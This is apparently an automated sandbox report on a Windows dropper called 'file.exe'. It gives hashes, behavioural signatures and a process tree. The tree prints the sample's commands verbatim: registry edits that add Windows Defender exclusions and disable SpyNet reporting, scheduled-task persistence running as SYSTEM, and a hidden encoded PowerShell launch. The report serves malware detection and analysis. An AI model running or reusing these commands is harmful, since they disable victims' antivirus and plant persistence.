Analysis
-
max time kernel
87s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
26-12-2022 17:24
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
dd3c7012ee1c1b8a41669e62bb64cd6b
-
SHA1
84dbc39d2169552b844e2fdb312fa4803d68afdd
-
SHA256
5e8824b0ea892ca33eecce13d9c8986c798315d98fe3e189c18d010c9b43a74f
-
SHA512
a0d50ce2199af5ff547f87889a8813e350b6b96765bcdfbb0bc70d46eb2746129aa9a787321fd9b2bf8ea819e7fcff65e1a3b6dc2c3ffbfbc3b5ab707c415d4b
-
SSDEEP
196608:91O5mzs56lswgLujKOL821ENrZPCtESVPKLX1vgPHBDm:3OYg6lhUO4AwPeVP4IH9m
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 58 1212 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 4152 Install.exe 2488 Install.exe 4412 tcdabMc.exe 1300 ZYSWaGa.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation ZYSWaGa.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation Install.exe -
Loads dropped DLL 1 IoCs
pid Process 1212 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json ZYSWaGa.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ZYSWaGa.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini tcdabMc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ZYSWaGa.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_392D09B4041D6970192F5EF741FAA9F2 ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_392D09B4041D6970192F5EF741FAA9F2 ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ZYSWaGa.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZYSWaGa.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol tcdabMc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D ZYSWaGa.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ZYSWaGa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C ZYSWaGa.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\TloWHzQxU\xcJoxY.dll ZYSWaGa.exe File created C:\Program Files (x86)\eSoSRLDipKupC\usTDTCp.dll ZYSWaGa.exe File created C:\Program Files (x86)\wqPaCWxmyWUn\hIUUgCT.dll ZYSWaGa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZYSWaGa.exe File created C:\Program Files (x86)\TloWHzQxU\yJMXuEH.xml ZYSWaGa.exe File created C:\Program Files (x86)\QxhTRhBLgDrU2\LYHrjRo.xml ZYSWaGa.exe File created C:\Program Files (x86)\zopNtCPofqZRshxFhVR\wLuLAAl.xml ZYSWaGa.exe File created C:\Program Files (x86)\eSoSRLDipKupC\MbsKZxr.xml ZYSWaGa.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZYSWaGa.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZYSWaGa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ZYSWaGa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZYSWaGa.exe File created C:\Program Files (x86)\QxhTRhBLgDrU2\zxxcrJXoZxeYx.dll ZYSWaGa.exe File created C:\Program Files (x86)\zopNtCPofqZRshxFhVR\rYmduNH.dll ZYSWaGa.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bhiKLDYYmOVJYRnmNA.job schtasks.exe File created C:\Windows\Tasks\jAPQkthTMSklmsWLq.job schtasks.exe File created C:\Windows\Tasks\rSkSwYHQOxYzETV.job schtasks.exe File created C:\Windows\Tasks\lCFTjNOFEcSKwrIvx.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1516 schtasks.exe 1808 schtasks.exe 4008 schtasks.exe 3880 schtasks.exe 3840 schtasks.exe 2176 schtasks.exe 2068 schtasks.exe 4644 schtasks.exe 1072 schtasks.exe 4372 schtasks.exe 3036 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "0" ZYSWaGa.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ZYSWaGa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket ZYSWaGa.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000}\MaxCapacity = "15140" ZYSWaGa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000} ZYSWaGa.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix ZYSWaGa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ZYSWaGa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000}\NukeOnDelete = "0" ZYSWaGa.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ZYSWaGa.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ZYSWaGa.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" ZYSWaGa.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ZYSWaGa.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 4676 powershell.EXE 4676 powershell.EXE 4080 powershell.exe 4080 powershell.exe 3376 powershell.exe 3376 powershell.exe 2236 powershell.EXE 2236 powershell.EXE 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe 1300 ZYSWaGa.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4676 powershell.EXE Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 3376 powershell.exe Token: SeDebugPrivilege 2236 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4632 wrote to memory of 4152 4632 file.exe 81 PID 4632 wrote to memory of 4152 4632 file.exe 81 PID 4632 wrote to memory of 4152 4632 file.exe 81 PID 4152 wrote to memory of 2488 4152 Install.exe 82 PID 4152 wrote to memory of 2488 4152 Install.exe 82 PID 4152 wrote to memory of 2488 4152 Install.exe 82 PID 2488 wrote to memory of 2788 2488 Install.exe 86 PID 2488 wrote to memory of 2788 2488 Install.exe 86 PID 2488 wrote to memory of 2788 2488 Install.exe 86 PID 2488 wrote to memory of 1204 2488 Install.exe 88 PID 2488 wrote to memory of 1204 2488 Install.exe 88 PID 2488 wrote to memory of 1204 2488 Install.exe 88 PID 2788 wrote to memory of 4708 2788 forfiles.exe 90 PID 2788 wrote to memory of 4708 2788 forfiles.exe 90 PID 2788 wrote to memory of 4708 2788 forfiles.exe 90 PID 4708 wrote to memory of 376 4708 cmd.exe 91 PID 4708 wrote to memory of 376 4708 cmd.exe 91 PID 4708 wrote to memory of 376 4708 cmd.exe 91 PID 1204 wrote to memory of 3580 1204 forfiles.exe 92 PID 1204 wrote to memory of 3580 1204 forfiles.exe 92 PID 1204 wrote to memory of 3580 1204 forfiles.exe 92 PID 4708 wrote to memory of 4000 4708 cmd.exe 93 PID 4708 wrote to memory of 4000 4708 cmd.exe 93 PID 4708 wrote to memory of 4000 4708 cmd.exe 93 PID 3580 wrote to memory of 2364 3580 cmd.exe 94 PID 3580 wrote to memory of 2364 3580 cmd.exe 94 PID 3580 wrote to memory of 2364 3580 cmd.exe 94 PID 3580 wrote to memory of 4916 3580 cmd.exe 95 PID 3580 wrote to memory of 4916 3580 cmd.exe 95 PID 3580 wrote to memory of 4916 3580 cmd.exe 95 PID 2488 wrote to memory of 2068 2488 Install.exe 97 PID 2488 wrote to memory of 2068 2488 Install.exe 97 PID 2488 wrote to memory of 2068 2488 Install.exe 97 PID 2488 wrote to memory of 2840 2488 Install.exe 99 PID 2488 wrote to memory of 2840 2488 Install.exe 99 PID 2488 wrote to memory of 2840 2488 Install.exe 99 PID 4676 wrote to memory of 3160 4676 powershell.EXE 103 PID 4676 wrote to memory of 3160 4676 powershell.EXE 103 PID 2488 wrote to memory of 4060 2488 Install.exe 110 PID 2488 wrote to memory of 4060 2488 Install.exe 110 PID 2488 wrote to memory of 4060 2488 Install.exe 110 PID 2488 wrote to memory of 1516 2488 Install.exe 112 PID 2488 wrote to memory of 1516 2488 Install.exe 112 PID 2488 wrote to memory of 1516 2488 Install.exe 112 PID 4412 wrote to memory of 4080 4412 tcdabMc.exe 116 PID 4412 wrote to memory of 4080 4412 tcdabMc.exe 116 PID 4412 wrote to memory of 4080 4412 tcdabMc.exe 116 PID 4080 wrote to memory of 4576 4080 powershell.exe 118 PID 4080 wrote to memory of 4576 4080 powershell.exe 118 PID 4080 wrote to memory of 4576 4080 powershell.exe 118 PID 4576 wrote to memory of 2680 4576 cmd.exe 119 PID 4576 wrote to memory of 2680 4576 cmd.exe 119 PID 4576 wrote to memory of 2680 4576 cmd.exe 119 PID 4080 wrote to memory of 4700 4080 powershell.exe 120 PID 4080 wrote to memory of 4700 4080 powershell.exe 120 PID 4080 wrote to memory of 4700 4080 powershell.exe 120 PID 4080 wrote to memory of 2604 4080 powershell.exe 121 PID 4080 wrote to memory of 2604 4080 powershell.exe 121 PID 4080 wrote to memory of 2604 4080 powershell.exe 121 PID 4080 wrote to memory of 3648 4080 powershell.exe 122 PID 4080 wrote to memory of 3648 4080 powershell.exe 122 PID 4080 wrote to memory of 3648 4080 powershell.exe 122 PID 4080 wrote to memory of 1548 4080 powershell.exe 123 PID 4080 wrote to memory of 1548 4080 powershell.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\7zS5B44.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Users\Admin\AppData\Local\Temp\7zS614F.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:376
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4000
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2364
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4916
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRDQrEhvJ" /SC once /ST 11:15:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRDQrEhvJ"4⤵PID:2840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRDQrEhvJ"4⤵PID:4060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhiKLDYYmOVJYRnmNA" /SC once /ST 18:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\UsCmcJSqHTXYNvr\tcdabMc.exe\" LE /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1516
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3160
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4540
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3128
-
C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\UsCmcJSqHTXYNvr\tcdabMc.exeC:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\UsCmcJSqHTXYNvr\tcdabMc.exe LE /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4412 -
